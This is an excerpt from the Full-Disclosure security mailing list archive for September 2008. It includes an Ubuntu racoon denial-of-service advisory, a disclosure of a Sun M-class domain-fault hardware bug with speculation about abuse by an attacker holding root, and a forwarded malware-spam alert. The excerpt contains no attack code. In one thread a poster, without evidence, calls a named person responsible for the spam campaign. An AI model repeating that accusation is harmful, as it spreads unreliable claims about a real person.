The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: racoon 1:0.6.5-4ubuntu1.2 Ubuntu 7.04: racoon 1:0.6.6-3ubuntu3.1 Ubuntu 7.10: racoon 1:0.6.6-3.1ubuntu3.1 Ubuntu 8.04 LTS: racoon 1:0.6.7-1.1ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that there were multiple ways to leak memory during the IKE negotiation when handling certain packets. If a remote attacker sent repeated malicious requests, the "racoon" key exchange server could allocate large amounts of memory, possibly leading to a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2.diff.gz Size/MD5: 47976 6638ae6b7edc7671f77af5b93763de0d http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2.dsc Size/MD5: 750 7d87380c510f48a35da9333fbfaf6629 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5.orig.tar.gz Size/MD5: 914466 168076243c023782d3fb44a583d4a32c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2_amd64.deb Size/MD5: 89430 2750ab4633d8ae447bed5aa7971aba48 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.2_amd64.deb Size/MD5: 342540 912a807165c43ce90d3c60cc211ec94b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2_i386.deb Size/MD5: 82876 5958ed679926590d81b53ecf8c651331 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.2_i386.deb Size/MD5: 311398 ef1a597a39f3ee88292364b037452395 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2_powerpc.deb Size/MD5: 91124 e140993179e7d7187574bf971d6773f5 
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.2_powerpc.deb Size/MD5: 336876 9bfa3bb9da23913f4ca6161a0acc602f sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2_sparc.deb Size/MD5: 86632 210608ca3d4990fb54566f6d4b3942c8 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.2_sparc.deb Size/MD5: 316756 ad7f2ccefd4f35cb8aaf5980e53a9499 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1.diff.gz Size/MD5: 51311 51c0a08c38483a47bd3b2d8a73e1287f http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1.dsc Size/MD5: 848 50817196a867ed407f0c67f928bc2260 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6.orig.tar.gz Size/MD5: 914807 643a238e17148d242c603c511e28d029 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1_amd64.deb Size/MD5: 91284 1780bae1fe5fdb3b907c39a876a2c419 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3ubuntu3.1_amd64.deb Size/MD5: 345490 cb1610211a35a5a4f8d27b962e67830b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1_i386.deb Size/MD5: 85700 eb95ead40564cd0965a6c256cc29cda4 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3ubuntu3.1_i386.deb Size/MD5: 321292 338faec788865311b18ffe8aa9424ae5 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1_powerpc.deb Size/MD5: 95646 0b6ce9437e4255922de2ed241730aa73 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3ubuntu3.1_powerpc.deb Size/MD5: 347712 b7eadf3051881ee5d184aa93e0bc7f8e sparc architecture (Sun 
SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1_sparc.deb Size/MD5: 89750 e47a17747bf516f28ba30b71ab762df4 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3ubuntu3.1_sparc.deb Size/MD5: 323440 617461a267909d50f6d0994b03f55688 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1.diff.gz Size/MD5: 54744 118e0b2e21e6fd42e7b153212f9d7847 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1.dsc Size/MD5: 852 754c5e79157f7161d03323206c402c90 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6.orig.tar.gz Size/MD5: 914807 643a238e17148d242c603c511e28d029 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1_amd64.deb Size/MD5: 91780 cdeda0b4689c7051074ccfbf7757ca5b http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3.1ubuntu3.1_amd64.deb Size/MD5: 348172 07a71cb07b5edc9e805c716b6bdc7374 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1_i386.deb Size/MD5: 86050 2224517ec375bdf2d55ddeea1afcd8bb http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3.1ubuntu3.1_i386.deb Size/MD5: 323010 919ef460216ef536459dd21b50483b07 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1_lpia.deb Size/MD5: 86698 cf26821405e282cd0c158bef83ba75ca http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.6-3.1ubuntu3.1_lpia.deb Size/MD5: 323408 878b1d8f4c31dd4139e4ea14e4b9fefc powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1_powerpc.deb Size/MD5: 96036 037e835bb80cb35c792dce96168e502f 
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3.1ubuntu3.1_powerpc.deb Size/MD5: 349582 3d53de0ac8a3fcf27c8a28234c363099 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1_sparc.deb Size/MD5: 90208 7e6ae9b61a59731e5edf759da59b6443 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3.1ubuntu3.1_sparc.deb Size/MD5: 325398 ed029d3727b0abb6dfc5718661d3179f Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1.diff.gz Size/MD5: 263295 c9592c8529b56ee3d6b40a1e3745b4c2 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1.dsc Size/MD5: 865 e7183e67f50caf1a396570bf7a4f1e89 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7.orig.tar.gz Size/MD5: 933322 e9f38f6f12124b9c19da684c87db9fcf amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1_amd64.deb Size/MD5: 91902 412eee43832542bdb31e47a8eec55a4b http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.1_amd64.deb Size/MD5: 349030 bc73017cf4999c7e5f26218ef2e1e8a5 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1_i386.deb Size/MD5: 86470 3496a2a6e102a029364642c5a02d49ea http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.1_i386.deb Size/MD5: 324144 456c9da0a86535481406445d7e0a3e18 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1_lpia.deb Size/MD5: 86776 eafd43eda682ca7a99c3dcff763ea430 http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.1_lpia.deb Size/MD5: 324314 9349d9ecfb37919ac5caf4f841215a63 powerpc architecture (Apple Macintosh 
G3/G4/G5): http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1_powerpc.deb Size/MD5: 96006 d4195e7f700808a98fb4f79c9e3fd0a9 http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.1_powerpc.deb Size/MD5: 350830 eaa04a1b7456ec1ddf95c133aee9e2c8 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1_sparc.deb Size/MD5: 91072 f917354fcfa265bf5c008edea716e0ce http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.1_sparc.deb Size/MD5: 325378 4940622cdeaf063c76b9e090987d5e89 From deraadt at cvs.openbsd.org Tue Sep 9 07:56:53 2008 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Tue, 09 Sep 2008 00:56:53 -0600 Subject: [Full-disclosure] Sun M-class hardware denial of service Message-ID: <200809090656.m896urQJ027406@cvs.openbsd.org> Sun/Fujitsu M4000-M9000 machines are very expensive multicpu sparc64 architecture machines, scaling all the way up to 64 processors, 256 cores, and 512 threads. They use the Fujitsu SPARC64 VI (and more recently VII) processors. The smallest models are large (6U 84kg), and the larger models are fridge sized and cost more than a house. These machines can be split into domains. These domains are like virtual machines which can run their own OS, except that they are not virtual. The chassis contains actual partitioning hardware which routes the various cpus to only see specific hardware devices. The physical segmentation of the hardware obviously must be completely secure and reliable to meet Sun's promises of high availability. Sun's system partitioning domains are supposed to be the best of the isolation schemes in the market. 
But perhaps even they have problems. During the porting of OpenBSD/sparc64 to this family of machines it was discovered that the OS kernel can trigger a fault. This fault is caught by the systems management controller (the XSCF, Fujitsu's version of LOM/RSC console) which then powers the domain down, marks the mainboard in the chassis as faulty, and refuses to allow domains relying on that mainboard to be started. To clarify, the OS kernel does not crash; no -- the domain powers down. Normally one uses commands in the XSCF to power domains on and off. Those commands refuse to power up that domain again saying it has faulted. To repair this problem one must phone a friendly Sun support team. After providing them with the machine's serial number, Sun will dispatch an engineer with a generated series of codes that are valid for a 48-hour period. These codes are used to generate a one-time-password which enables a login to the service console within the XSCF. The engineer then uses the service console to clear the fault on the mainboard. That command then requires a POWERCYCLE OF THE ENTIRE CHASSIS. This means any other domains running on the same hardware must be shutdown to clear the fault generated in another domain. Please note that we have not tried to power cycle the entire chassis without clearing the fault using the Sun procedure. However, we do not see a difference in availability between that and a powercycle requested by the service console. These machines are run in mission critical environments where the concept of 'availability' blends with the concept of 'security'. The main customer base for these machines is apparently banks and other financial institutes. Machine prices start at $29,000, rocket to $180,000 (8 cpu), and continue higher to "Sun won't tell you on the web", so one could expect that the machine should probably not fail in such a harsh way. 
We do not have any information about how or why this problem happens, but feel compelled to speculate that there might be further problems with domain separation. Having to power down all the other domains is already, effectively, a big problem in domain separation. The problem is triggered when OpenBSD/sparc64 spins up the additional strands (threads) of each physical cpu in the domain. The OS continues running for a few moments and then the fault occurs. Newer versions of OpenBSD/sparc64 work around this problem (diff linked below) by not spinning up the additional strands on SPARC64 VI cpus. But we don't really know why this workaround helps. Since we do not have any tools to characterize the exact problem, the workaround might be accidentally avoiding the fault, but some other action could still cause it. The same problems do not occur on the other domain-capable Sun machines that OpenBSD runs on, for instance, those using UltraSPARC III, IV, T1, or T2 processors. http://www.openbsd.org/cgi-bin/cvsweb/src/sys/arch/sparc64/sparc64/cpu.c.diff?r1=1.43&r2=1.44 With the workaround in effect, the result is that this machine running OpenBSD is using half the available cpu, all to avoid a machine problem that might be triggered by something else. We do not yet know if the problem is due to a bug in the cpu, the chassis, or some other firmware component that is involved in domain partitioning. OpenBSD/sparc64 is probably doing something wrong -- but then the OS should crash instead of the domain. Whatever this hardware problem is, it could also be exercised in Solaris by loading a kernel module which does whatever OpenBSD is doing, and thus triggers a domain fault. If an attacker can gain root on a Solaris domain and load such a kernel module, the owner would be forced to eventually power down the entire machine and take all other domains down as well (which are running mission critical services, obviously). 
At http://www.sun.com/servers/white-papers/domains.html Sun claims that their domain technology offers "Complete isolation from software errors in other domains" and provides the benefit that "Mission-critical applications are not impacted by applications running within other domains". Maybe after this bug is fixed... Sun & Fujitsu should fix at least two things: - Greater recoverability. Don't require a powercycle of the chassis for such a type of domain fault, so that a failure of one domain does not kill the availability of other domains. - Don't fault in the first place! Find out what OS action is causing the fault, and make the firmware/hardware accept and handle this condition without faulting the domain. Sun (Australia) was alerted about this problem on July 24, 2008. Various other channels into Sun and Fujitsu were tried as well, but unfortunately no one in "security" seemed to understand that this issue matters, and it seems the engineering people made no progress either. We think the Sun engineers didn't even go through the effort to install OpenBSD in order to reproduce the problem. Any Sun / Fujitsu engineer who wants to solve this problem can either build their own kernel with the above patch un-applied, or can contact <dlg at openbsd.org>, <deraadt at openbsd.org> or <kettenis at openbsd.org>. From xploitable at gmail.com Tue Sep 9 14:48:53 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 9 Sep 2008 14:48:53 +0100 Subject: [Full-disclosure] Fwd: "Sex Scandal" Spam Campaign Targeting US Presidential Election Message-ID: <4b6ee9310809090648h42c6f937o92b3fa0c93f078a6@mail.gmail.com> Is Marcus Sachs responsible? Websense(R) Security Labs(TM) ThreatSeeker(TM) Network has discovered an emerging email campaign which uses the US presidential election as a social engineering mechanism to install information-stealing code on a victim's machine. 
With less than 2 months before the start of the election, emails are circulating with fake news of a sex scandal affecting one of the candidates. Recipients of the email are encouraged to view a video supposedly involving the Democratic candidate Barack Obama. Users who click the link are shown a pornographic video taken from hxxp://homemade*snip*.com/. While the video plays for 14 seconds, malicious applications are installed on the victim's machine. Screenshot of example email: http://securitylabs.websense.com/content/Alerts/3177.aspx From xploitable at gmail.com Tue Sep 9 15:11:25 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 9 Sep 2008 15:11:25 +0100 Subject: [Full-disclosure] "Sex Scandal" Spam Campaign Targeting US Presidential Election In-Reply-To: <4b6ee9310809090648h42c6f937o92b3fa0c93f078a6@mail.gmail.com> References: <4b6ee9310809090648h42c6f937o92b3fa0c93f078a6@mail.gmail.com> Message-ID: <4b6ee9310809090711s3c0a72a3pdaceed63ceeb7324@mail.gmail.com> On Tue, Sep 9, 2008 at 2:48 PM, n3td3v <xploitable at gmail.com> wrote: > Is Marcus Sachs responsible? > > Websense(R) Security Labs(TM) ThreatSeeker(TM) Network has discovered an > emerging email campaign which uses the US presidential election as a > social engineering mechanism to install information-stealing code on a > victim's machine. With less than 2 months before the start of the > election, emails are circulating with fake news of a sex scandal > affecting one of the candidates. Recipients of the email are > encouraged to view a video supposedly involving the Democratic > candidate Barack Obama. Users who click the link are shown a > pornographic video taken from hxxp://homemade*snip*.com/. While the > video plays for 14 seconds, malicious applications are installed on > the victim's machine. 
> > Screenshot of example email: > > http://securitylabs.websense.com/content/Alerts/3177.aspx > "How do we get the attention of the next administration as they are coming in?"--Marcus Sachs "How do we play into the media and get their attention?"--Marcus Sachs http://www.youtube.com/watch?v=FSUPTZVlkyU From xploitable at gmail.com Tue Sep 9 16:02:57 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 9 Sep 2008 16:02:57 +0100 Subject: [Full-disclosure] "Sex Scandal" Spam Campaign Targeting US Presidential Election In-Reply-To: <4b6ee9310809090711s3c0a72a3pdaceed63ceeb7324@mail.gmail.com> References: <4b6ee9310809090648h42c6f937o92b3fa0c93f078a6@mail.gmail.com> <4b6ee9310809090711s3c0a72a3pdaceed63ceeb7324@mail.gmail.com> Message-ID: <4b6ee9310809090802j7d0a7effn3c8ebd8e07196837@mail.gmail.com> On Tue, Sep 9, 2008 at 3:11 PM, n3td3v <xploitable at gmail.com> wrote: > On Tue, Sep 9, 2008 at 2:48 PM, n3td3v <xploitable at gmail.com> wrote: >> Is Marcus Sachs responsible? >> >> Websense(R) Security Labs(TM) ThreatSeeker(TM) Network has discovered an >> emerging email campaign which uses the US presidential election as a >> social engineering mechanism to install information-stealing code on a >> victim's machine. With less than 2 months before the start of the >> election, emails are circulating with fake news of a sex scandal >> affecting one of the candidates. Recipients of the email are >> encouraged to view a video supposedly involving the Democratic >> candidate Barack Obama. Users who click the link are shown a >> pornographic video taken from hxxp://homemade*snip*.com/. While the >> video plays for 14 seconds, malicious applications are installed on >> the victim's machine. 
>> >> Screenshot of example email: >> >> http://securitylabs.websense.com/content/Alerts/3177.aspx >> > > "How do we get the attention of the next administration as they are > coming in?"--Marcus Sachs > > "How do we play into the media and get their attention?"--Marcus Sachs > > http://www.youtube.com/watch?v=FSUPTZVlkyU > This appears to be a false flag operation carried out by the Marcus Sachs clan. http://en.wikipedia.org/wiki/False_flag All the best, n3td3v From mobort at hushmail.com Tue Sep 9 16:47:33 2008 From: mobort at hushmail.com (Month of Bill O'Reilly Transcripts) Date: Tue, 09 Sep 2008 11:47:33 -0400 Subject: [Full-disclosure] Month of Bill O'Reilly Transcripts Message-ID: <20080909154735.5F55920042@smtp.hushmail.com> Forever supporting the philosophies of full-disclosure, it is our honor to humbly present to you the first episode of our latest project - the Month of Bill O'Reilly Transcripts. Many special thanks to the Network Developer and Valdis Kletnieks for making this mailing list great. BILL O'REILLY, HOST: In the "Impact" segment tonight: our first conversation with Senator Barack Obama. It's been a long time coming, as you know. Thursday afternoon, I met with the senator in York, Pennsylvania. Now, we're going to play you the first part of the interview right now, and the rest of it, which is fairly extensive and provocative, will be seen next Monday, Tuesday and Wednesday. Roll the tape. (BEGIN VIDEOTAPE) O'REILLY: Well, first of all, thanks for being a man of your word. BARACK OBAMA, DEMOCRATIC PRESIDENTIAL CANDIDATE: You bet. O'REILLY: But I was worried there for awhile. It's been nine months since we last met in New Hampshire. OBAMA: It took a little while. I've had a few things to do in between, but I appreciate you having me on the show. O'REILLY: OK. Let's start with national security. Do you believe we're in the middle of a War on Terror? OBAMA: Absolutely. O'REILLY: Who's the enemy? 
OBAMA: Al Qaeda, the Taliban, a whole host of networks that are bent on attacking America, who have a distorted ideology, who have perverted the faith of Islam, and so we have to go after them. O'REILLY: Is Iran part of that component? OBAMA: Iran is a major threat. Now, I don't think that there is a -- the same -- they are not part of the same network. You've got Shia, and you've got Sunni. We've got to have the ability to distinguish between these groups, because, for example, the war in Iraq is a good example, where I believe the administration lumped together Saddam Hussein, a terrible guy, with Al Qaeda, which had nothing to do with Saddam Hussein. O'REILLY: We'll get to that. OBAMA: And as a consequence, we ended up, I think, misdirecting our resources. So they're all part of various terrorist networks that we have to shut down and we have to destroy, but they may not all be part and parcel of the same ideology. O'REILLY: But I still don't understand -- and I'm asking this as an American as well as a journalist -- how threatening you feel Iran is? Look, if Iran gets a nuclear weapon, OK, to me, they're going to give it to Hezbollah if they can develop the technology. Why not? And they'll say, "Well, we didn't have anything to do with it." So therefore, the next president of the United States is going to have to make a decision about Iran, whether to stop them militarily, because I don't believe -- if diplomacy works, fine, but you've got to have a Plan B, and a lot of people say, "Look, Barack Obama is not going to attack Iran." OBAMA: Here's where you and I agree. It is unacceptable for Iran to possess a nuclear weapon. It would be a game changer, and I've said that repeatedly. I've also said I would never take a military option off the table. O'REILLY: But would you prepare for one? OBAMA: Well, listen... O'REILLY: That's the question though, senator. Anybody can say option. Would you prepare for it? 
OBAMA: Look, it is not appropriate for somebody who is one of two people who can be the president of the United States to start tipping their hand in terms of what their plans might be with respect to Iran. It's sufficient to say I would not take the military option off the table and that I will never hesitate to use our military force in order to protect the homeland and United States' interests. But where I disagree with you is the notion that we've exhausted every other resource, because the fact of the matter is that, for six, seven years, during this administration, we weren't working as closely as we needed to do with the Europeans to create... O'REILLY: Diplomacy might work. You might be able to sanction economically. OBAMA: ...sanctions. O'REILLY: Maybe. O'REILLY: But that's all hypothetical. OBAMA: Everything is hypothetical, but the question is, are we trying to do what we need to do to ratchet up the pressure on them, to change their... O'REILLY: OK. We'll assume you're going to ratchet everything you can ratchet. But I'm going to assume that Iran is going to say, "Blank you. We're going to do what we want." And I want a president, whether it's you or McCain, who says, "You ain't doing that." All right. Let's go to Iraq. I think history will show it's the wrong battlefield, OK? And I think that you were perspicacious in your original assessment of the battlefield. OBAMA: I appreciate that. O'REILLY: I think you were desperately wrong on the surge, and I think you should admit it to the nation that now we have defeated the terrorists in Iraq, and the Al Qaeda came there after we invaded, as you know. We defeated them. OBAMA: Right. O'REILLY: If we didn't, they would have used it as a staging ground. We've also inhibited Iran from controlling the southern part of Iraq by the surge, which you did not support. So why won't you say, "I was right in the beginning. I was wrong about that"? 
OBAMA: If you listen to what I've said, and I'll repeat it right here on this show, I think that there's no doubt that the violence is down. I believe that that is a testimony to the troops that were sent and General Petraeus and Ambassador Crocker. I think that the surge has succeeded in ways that nobody anticipated, by the way, including President Bush and the other supporters. It has gone very well, partly because of the Anbar situation and the Sunni awakening, partly because of the Shia military. Look... O'REILLY: But if it were up to you, there wouldn't have been a surge. OBAMA: Look... O'REILLY: No, no, no, no. OBAMA: No, no, no... O'REILLY: If it were up to you, there wouldn't have been a surge. OBAMA: No, no, no. O'REILLY: You and Joe Biden, no surge. OBAMA: Hold on a second, Bill. If you look at the debate that was taking place, we had gone through five years of mismanagement of this war that I thought was disastrous. And the president wanted to double down and continue on an open-ended policy that did not create the kinds of pressure on the Iraqis to take responsibility and reconcile. O'REILLY: But it worked. It worked. Come on. OBAMA: Bill, what I've said is -- I've already said it succeeded beyond our wildest dreams. O'REILLY: Why can't you say, "I was right in the beginning, and I was wrong about the surge"? OBAMA: Because there's an underlying problem where what have we done. We have reduced the violence. O'REILLY: Yes. OBAMA: But the Iraqis still haven't taken responsibility, and we still don't have the kind of political reconciliation. We are still spending, Bill, $10 to $12 billion a month. O'REILLY: And I hope if you're president, you can get them to kick in and pay us back. OBAMA: They've got $79 billion. O'REILLY: I'll go with you. OBAMA: Let's go. O'REILLY: We'll get some of that money back. All right. Let's go to Afghanistan. Look, there's no winning the Taliban war unless Pakistan cracks down on the guys that are in Pakistan. 
OBAMA: You and I agree completely. Right. O'REILLY: We all know that. OBAMA: Right. O'REILLY: You gave a speech in Denver -- good speech, by the way. OBAMA: Thank you. O'REILLY: But you bloviated about McCain not following him to the cave. You're not going to invade Pakistan, senator, if you're president. You're not going to send ground troops in there. You know it. OBAMA: Here's the problem. John McCain loves to say, "I would follow them to the gates of Hell." O'REILLY: But he's not going to invade either. OBAMA: And the point is what we could have done... O'REILLY: No, not could. Let's stay in now. OBAMA: What we can do... O'REILLY: Yes. OBAMA: ...is stay focused on Afghanistan and put more pressure on the Pakistanis. O'REILLY: Like what? OBAMA: For example, we are providing them military aid without having enough strings attached. So they're using the military aid that we use to Pakistan, they're preparing for a war against India. O'REILLY: So you're going to pull it out and let the Islamic fundamentalists take them over? OBAMA: No, no, no, no. What we say is, look, we're going to provide them with additional military support targeted at terrorists, and we're going to help build their democracy and provide... O'REILLY: We're doing that now. Negroponte's over there, and he's doing that. OBAMA: That is not what we've been doing, Bill. We've wasted $10 billion with Musharraf without holding him accountable for knocking out those safe havens. O'REILLY: So you are going to -- again, more diplomacy, and we need it, absolutely, trying to convince the Pakistan government to take a more aggressive approach. If you don't, we're going to pull? OBAMA: And what I will do is, if we have bin Laden in our sights... O'REILLY: Yes. OBAMA: ...we target him, and we knock him out. O'REILLY: But everybody would do that. I mean, that would be the biggest win Bush could have. OBAMA: Of course. O'REILLY: If you send ground troops in, all hell breaks loose. OBAMA: We can't -- 
we can't have -- and nobody talked about some full-blown invasion of Pakistan, but the simple point that I made was we've got to put more pressure on Pakistan to do what they need to do. (END VIDEOTAPE) O'REILLY: All right. Again, the rest of the interview will be seen on Monday, Tuesday and Wednesday of next week, and it is lively. From le at atelophobia.net Tue Sep 9 18:03:04 2008 From: le at atelophobia.net (Luiz Eduardo) Date: Tue, 9 Sep 2008 10:03:04 -0700 Subject: [Full-disclosure] Call for Papers - YSTS 2.0 - 2008 - Sao Paulo/ Brazil References: <20080822102738.A4258CB6CB@ws5-11.us4.outblaze.com> <29291087.1219413240215.JavaMail.root@m11> Message-ID: <4B84CCE4D5BD4D1DB8D17028F98B4F68@video54.local> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 (sorry for the xpostings) The call for papers for YSTS (you sh0t the sheriff) 2.0 is now open! The 2nd edition will be held in Sao Paulo, Brazil, on November 17th and 18th, 2008 INTRODUCTION YSTS is a very unique event dedicated to the top-notch Information Security Society in Brazil, with local speakers and speakers from abroad. YSTS mixes the highest quality presentations, covering diverse topics in information security, from all technical haxor to management C level good stuff. The goal is to make the attendees get the "real big picture" of the current state of information security world, mixing professionals from different Infosec segments of the market. For the attendees, this is almost an invite-only event. So, submitting a talk is certainly a good hack to try to be there, especially if you're local. 
Due to the success of last year's edition, we'll keep the same format: - - Kicked-back and cozy environment - - YSTS 2.0 will be held at an almost secret location - - Once again, this secret location will, most likely, be a club or a bar - - and yes, we have food and drinks CONFERENCE TOPICS The focus for YSTS 2.0 will include the following: * Operating Systems * Career and Management topics * Mobile Devices/Embedded Systems * Information Security Audit and Control * Web and anything 2.0 * Information Security Policies * Networking/Telecommunication/Radio Frequencies * Incident Response & other applicable (and useful) Infosec Policies * Information Warfare * Malware/ BotNets * User awareness/ Social Networking Threats * Secure Programming * Hacker Spaces/ hacker community * Fuzzing * Physical Security * Virtualization * Cryptography / Obfuscation * Infrastructure and Critical Systems * Caipirinha Hacks * and everything else security related you might think would be good for the conference We like shorter talks, 30 minutes is plenty for you to deliver the message, but, if you feel like you need more time, please be specific in the paper submission WHAT WOULD YOU GET BEING A SPEAKER? * Round-trip economy class air-ticket for one person * Airport transportation arrangements * 4 nights of accommodation * Breakfast, lunch and dinner during conference * After-conference parties * Auditing products in traditional Brazilian barbecue restaurants WHY WOULD YOU WANT TO BE A SPEAKER AND GO TO BRAZIL? 
* Sao Paulo is a melting-pot of different cultures, with plenty of stuff to do * We really take care of our speakers (you don't have to trust us, I am sure you know at least one of our previous speakers, check with them) * We highly recommend that if you're coming from abroad, you stick around for a few more days * and yeah, beautiful people too CFP SUBMISSION Each paper submission must include the following information: * Name, title, address, email and phone/contact number * Short biography and qualification * Speaking experience * Summary or abstract for your presentation * Technical requirements (others than LCD Projector) * Other publications or conferences where this material has been or will be published/submitted. We do accept submissions in English, Portuguese or Spanish. IMPORTANT DATES Final CFP Submission - October 5th, 2008 Final Notification of Acceptance - October 15th, 2008 Final Material Submission for accepted presentations - November 5th, 2008 Please send your talk submission to cfp/at/ysts.org CONTACT INFORMATION General Inquiries: b0ard/at/ysts.org Sponsorship Inquiries: sponsors/at/ysts.org We hope to see you there! -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.1 (Build 2523) Charset: iso-8859-1 wj8DBQFIxqxIgo//xpeLCaoRAtoyAJsEAZxwHTWMQvrDXfhBomxnt0/7QgCgqkD9 S793ETlQvEITwiC7Z/vxoYY= =2Sgx -----END PGP SIGNATURE----- From johnc at grok.org.uk Tue Sep 9 18:12:35 2008 From: johnc at grok.org.uk (John Cartwright) Date: Tue, 9 Sep 2008 18:12:35 +0100 Subject: [Full-disclosure] List Charter Message-ID: <20080909171235.GA34@grok.org.uk> [Full-Disclosure] Mailing List Charter John Cartwright <johnc at grok.org.uk> - Introduction & Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. 
